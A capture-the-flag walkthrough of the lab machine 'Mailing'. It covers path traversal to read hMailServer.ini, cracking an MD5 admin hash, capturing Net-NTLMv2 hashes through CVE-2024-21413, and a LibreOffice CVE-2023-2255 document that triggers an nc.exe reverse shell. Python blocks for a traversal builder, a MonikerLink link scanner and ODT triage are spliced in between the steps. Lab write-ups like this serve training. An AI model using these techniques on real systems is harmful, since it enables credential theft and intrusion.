Mailing is an easy Windows machine that runs hMailServer and hosts a website vulnerable to path traversal. The traversal lets us read the hMailServer configuration file, which reveals the Administrator password hash. Cracking that hash gives the hMailServer administrator password, which also works for logging in to the mail server. We then leverage CVE-2024-21413 (the MonikerLink bug, which Microsoft tracks as an Outlook vulnerability) against the Windows Mail client on the remote host to capture the Net-NTLMv2 response for user maya, crack it to obtain her password, and log in as maya via WinRM. For privilege escalation, we exploit CVE-2023-2255 in LibreOffice.

Enumeration

Let's start with our usual Nmap scans of the machine: default scripts and version detection against the top 1000 ports first.

sudo nmap -sC -sV 10.129.231.40 -oA nmap_1000 

Then all 65535 TCP ports:

sudo nmap -p- 10.129.231.40 -oA nmap_full

Let's add an entry for mailing.htb to /etc/hosts with the corresponding IP address so the name resolves and we can reach the site in a browser.

echo "10.129.231.40 mailing.htb" | sudo tee -a /etc/hosts

SMB Null Session

Attempting to establish an SMB null session was unsuccessful.

I decided to shift focus to exploring the web service, as it seemed more interesting and relevant for further investigation.

Website - TCP 80

Site

The website is for an organization that provides a mail server:

There are three notable names on the site.

The “Download Instructions” button links to http://mailing.htb/download.php?file=instructions.pdf. This 16-page PDF contains setup instructions for mail clients on Windows and Ubuntu, covering both Windows Mail and Thunderbird. One key detail in the document is the example email address:

maya@mailing.htb.

This matches a previously noted name, suggesting that the other two users are likely ruy@mailing.htb and gregory@mailing.htb.

After gathering all this information, I proceeded to search for known exploits related to hMailServer using searchsploit:

searchsploit hMailServer

From the results, I found a file inclusion vulnerability in the PHPWebAdmin interface of hMailServer 4.4.2. The target does not expose PHPWebAdmin (only the mail server itself and the PHP site), but the endpoint /download.php?file=instructions.pdf takes a filename straight from the query string, so I suspected it might be vulnerable to the same class of bug. To investigate, I pulled the exploit down with searchsploit:

Upon reviewing the exploit:

This vulnerability allows local file inclusion, which could be exploited to access sensitive configuration files.

We can verify the path traversal by changing the file parameter so it climbs out of the web root and reads C:\Windows\win.ini, a world-readable file present on every Windows install, using the following payload.

Since the server is running hMailServer, a quick Google search gives the location of its configuration file: C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini. Next, let's read this file with the following URL-encoded payload (each backslash becomes %5C and each space %20, otherwise the web server mangles the path).

The file holds two secrets: AdministratorPassword under [Security] and Password under [Database].

Crack Password

Both values are 32-character hex strings, so I submitted them to CrackStation as MD5. Only the administrator value is a real hash: hMailServer stores the AdministratorPassword as an unsalted MD5, but the [Database] Password is encrypted with a key hard-coded in hMailServer rather than hashed, so a hash lookup cannot recover it.

The administrator password was revealed to be homenetworkingadministrator.
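To make the traversal and the hash-cracking steps above concrete, here is an added Python example (not from the original write-up or from hMailServer): it builds the URL-encoded `..\` payload for the `file` parameter, parses a hMailServer.ini into its two secrets, and does the equivalent of the CrackStation lookup offline with a small wordlist. The INI content and the database password value are constructed for the demo; the MD5 is computed at import time so the block is self-contained.

```python
import configparser
import hashlib
import urllib.parse

# Constructed sample of hMailServer.ini, laid out like the real file. The
# admin hash is computed here so the demo runs offline; the database value
# is a made-up placeholder (hMailServer encrypts that field, it is not MD5).
ADMIN_MD5 = hashlib.md5(b"homenetworkingadministrator").hexdigest()
SAMPLE_INI = """[Directories]
ProgramFolder=C:\\Program Files (x86)\\hMailServer
DatabaseFolder=C:\\Program Files (x86)\\hMailServer\\Database
[Security]
AdministratorPassword=%s
[Database]
Type=MSSQLCE
Username=
Password=0123456789abcdef0123456789abcdef
PasswordEncryption=1
Database=hMailServer
""" % ADMIN_MD5


def traversal_url(base, param, depth, target):
    """Build the URL-encoded ..\\ traversal for a Windows path-traversal read.

    depth is how many directories to climb out of the web root. Backslashes
    become %5C and spaces/parentheses are percent-encoded as well, which is
    what the raw payload in the write-up looks like once encoded.
    """
    payload = "..\\" * depth + target
    return "%s?%s=%s" % (base, param, urllib.parse.quote(payload, safe=""))


def extract_hmail_secrets(ini_text):
    """Pull the two secret values (and the encryption flag) out of hMailServer.ini."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(ini_text)
    return {
        "AdministratorPassword": cp["Security"]["AdministratorPassword"],
        "DatabasePassword": cp["Database"]["Password"],
        # PasswordEncryption=1 means the DB password is encrypted, not hashed,
        # so it is not a candidate for an MD5 lookup.
        "DatabasePasswordEncrypted": cp["Database"].get("PasswordEncryption") == "1",
    }


def crack_md5(hexdigest, candidates):
    """Offline equivalent of the CrackStation lookup for an unsalted MD5."""
    target = hexdigest.strip().lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


if __name__ == "__main__":
    print(traversal_url("http://mailing.htb/download.php", "file", 3,
                        "Program Files (x86)\\hMailServer\\Bin\\hMailServer.ini"))
    secrets = extract_hmail_secrets(SAMPLE_INI)
    print(secrets)
    # Only the administrator value cracks; the encrypted DB value returns None.
    wordlist = ["password", "hmailserver", "homenetworkingadministrator"]
    print(crack_md5(secrets["AdministratorPassword"], wordlist))
    print(crack_md5(secrets["DatabasePassword"], wordlist))
```

Three `..\` is enough when the site root sits at a depth of three directories under the drive root (for example C:\wwwroot\site); against a real target you walk the depth up until win.ini comes back, as the write-up does.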

Verifying Credentials

I used Thunderbird to test the credentials and successfully logged in as the administrator using the password homenetworkingadministrator.

Foothold

Since the remote Windows server runs a mail server, it is likely that someone on it also runs a mail client against it. The default client on Windows is Windows Mail, and the installation PDF walks through configuring it, so I suspected that is what the users have. Searching for vulnerabilities in that link-handling code led me to CVE-2024-21413, also known as the MonikerLink bug, which Microsoft tracks as a Microsoft Outlook remote code execution vulnerability.

The root cause lies in how the client interprets certain hyperlinks, specifically ones that are parsed as COM Monikers. If a link points at an SMB share (formatted as \\<Malicious_IP>\file), the client follows it and automatically authenticates to the attacker's server with the current user's Windows credentials. What the attacker captures is a Net-NTLMv2 challenge-response, not the raw NT hash: it cannot be replayed for pass-the-hash, but it can be cracked offline to recover the password.
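The defensive counterpart to the paragraph above, as an added Python example (not part of the original write-up or of the PoC repository): a small mail-gateway style check that parses a raw message, pulls every `href` out of its HTML parts and flags targets that are UNC paths or `file:` URLs, noting the trailing `!` that is the publicly documented trick for getting the link treated as a Moniker. The message, the IP 10.10.14.5 and the share name are constructed for the demo.

```python
import email
import re
from email.policy import default

# Constructed example of the kind of message the PoC sends: one text/html part
# containing a benign https link and a UNC-style file: link. In a regular
# Python string "\\\\" is two backslashes, so the href the parser sees is
# file:///\\10.10.14.5\share\invoice.rtf!x
SAMPLE_EML = """\
From: attacker@mailing.htb
To: maya@mailing.htb
Subject: Your invoice
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Hi Maya, see <a href="https://mailing.htb/help">the guide</a>.</p>
<p>Invoice: <a href="file:///\\\\10.10.14.5\\share\\invoice.rtf!x">open</a></p>
</body></html>
"""

HREF_RE = re.compile(r"""href\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def classify_href(href):
    """Return a finding for a file: or UNC link target, or None for anything else."""
    h = href.strip()
    low = h.lower()
    if not (low.startswith("file:") or low.startswith("\\\\")):
        return None
    # Drop the scheme and leading slashes/backslashes to expose host\share\path.
    body = re.sub(r"^file:", "", h, flags=re.IGNORECASE).lstrip("/\\")
    host = re.split(r"[\\/]", body, maxsplit=1)[0]
    return {
        "href": h,
        "host": host,
        # A "!" after the target file name is the documented MonikerLink
        # marker: it turns the path into a Moniker and skips the warning.
        "moniker_bypass": "!" in body,
    }


def scan_message(raw):
    """Parse a raw RFC 5322 message and flag UNC/file: links in its HTML parts."""
    msg = email.message_from_string(raw, policy=default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        for href in HREF_RE.findall(part.get_content()):
            finding = classify_href(href)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_message(SAMPLE_EML):
        print("UNC/file link -> host %s, moniker bypass: %s (%s)"
              % (f["host"], f["moniker_bypass"], f["href"]))
```

The same check is useful on the egress side: a host that tries to reach an external IP on TCP 445 right after a mail fetch is the network-level signature of this bug, regardless of how the link was written.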

A Google search turned up a GitHub repository with a proof of concept (PoC) for CVE-2024-21413 that simply generates the HTML email and sends it over SMTP. I cloned it to my host:

git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability && cd CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

I ran the PoC to send the email, with an SMB listener (smbserver) running in another window to capture the authentication attempt:

Crack

We crack the captured Net-NTLMv2 response with hashcat (mode 5600, NetNTLMv2):

WinRM

I used the recovered password m4y4ngs4ri to log in as user maya via WinRM.

From there I can read the user flag.

Privilege Escalation

While enumerating the filesystem, we discover that LibreOffice is installed on the system.

The installed version of LibreOffice is:

With the version information for LibreOffice, we search for related exploits and find that this version is vulnerable to CVE-2023-2255 (fixed in LibreOffice 7.4.7 and 7.5.3). The flaw is improper access control in LibreOffice's editor components: a crafted document can load external links, including embedded frames and script links, without prompting the user. Assuming a privileged user on the box opens files with LibreOffice, we can drop a malicious document on the system and wait for it to be opened, which triggers our payload. A proof of concept (PoC) that generates the malicious document can be found here. Let's clone the repository to our local system.
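Two checks a practitioner would want alongside the paragraph above, as an added Python example (not from the original write-up or the PoC repository): a version test against the fixed releases 7.4.7 and 7.5.3, and a heuristic triage of an .odt that lists floating frames, `vnd.sun.star.script:` URIs and other external `xlink:href` targets in its XML, which is where a document built to abuse this bug carries its payload reference. The two ODT files are constructed in memory for the demo and are not copies of the PoC's output.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"


def cve_2023_2255_affected(version):
    """True if a LibreOffice version string predates the fixed releases.

    The fix shipped in 7.4.7 and 7.5.3: every release before 7.4.7 and the
    7.5 branch before 7.5.3 are affected; 7.6 and later never were.
    """
    v = tuple(int(x) for x in version.split(".")[:3])
    v = v + (0,) * (3 - len(v))
    return v < (7, 4, 7) or (7, 5, 0) <= v < (7, 5, 3)


def odt_external_links(odt_bytes):
    """Heuristic triage of an ODT: floating frames, script URIs, external hrefs.

    An ODT is a zip; the document body is content.xml. A clean document with
    only internal references yields an empty list.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as z:
        for name in ("content.xml", "styles.xml"):
            if name not in z.namelist():
                continue
            for el in ET.fromstring(z.read(name)).iter():
                tag = el.tag.rsplit("}", 1)[-1]
                href = el.attrib.get(XLINK_HREF, "")
                if tag == "floating-frame":
                    findings.append({"file": name, "kind": "floating-frame", "href": href})
                elif href.lower().startswith("vnd.sun.star.script:"):
                    findings.append({"file": name, "kind": "script-uri", "href": href})
                elif ":" in href or href.startswith(("/", "\\")):
                    # Anything with a scheme or an absolute path leaves the
                    # package; relative paths like Pictures/x.png stay inside it.
                    findings.append({"file": name, "kind": "external-link", "href": href})
    return findings


def build_odt(content_xml):
    """Constructed minimal ODT (mimetype + content.xml) for the demo."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text",
                   compress_type=zipfile.ZIP_STORED)
        z.writestr("content.xml", content_xml)
    return buf.getvalue()


NS = ('xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
      'xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" '
      'xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" '
      'xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" '
      'xmlns:xlink="http://www.w3.org/1999/xlink"')

BENIGN_ODT = build_odt(
    f'<office:document-content {NS}><office:body><office:text>'
    '<text:p>Quarterly report</text:p>'
    '</office:text></office:body></office:document-content>')

# Constructed suspicious document: a floating frame pointing off-host and a
# script URI wired to a load event. The IP is a placeholder.
SUSPICIOUS_ODT = build_odt(
    f'<office:document-content {NS}><office:body><office:text>'
    '<text:p>Open me</text:p>'
    '<draw:frame draw:name="f1">'
    '<draw:floating-frame xlink:type="simple" xlink:href="http://10.10.14.5/payload"/>'
    '<office:event-listeners><script:event-listener script:event-name="dom:load" '
    'xlink:href="vnd.sun.star.script:Standard.Module1.Main?language=Basic&amp;location=document"/>'
    '</office:event-listeners></draw:frame>'
    '</office:text></office:body></office:document-content>')


if __name__ == "__main__":
    for ver in ("7.4.0.3", "7.4.7.2", "7.5.2", "7.5.3.2"):
        print(ver, "affected" if cve_2023_2255_affected(ver) else "patched")
    print("benign:", odt_external_links(BENIGN_ODT))
    print("suspicious:", odt_external_links(SUSPICIOUS_ODT))
```

The version check is the quick answer to "is this host exposed"; the ODT scan is what you run over a document before anyone opens it, or over a user's Documents folder during incident response, to find the file that pulled a payload in.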

git clone https://github.com/elweth-sec/CVE-2023-2255.git

Following the PoC instructions, we run the Python script to generate a malicious .odt that pings our host when opened:

After confirming that the ping comes back, I upload nc.exe together with a second malicious .odt that runs it, and catch a reverse shell: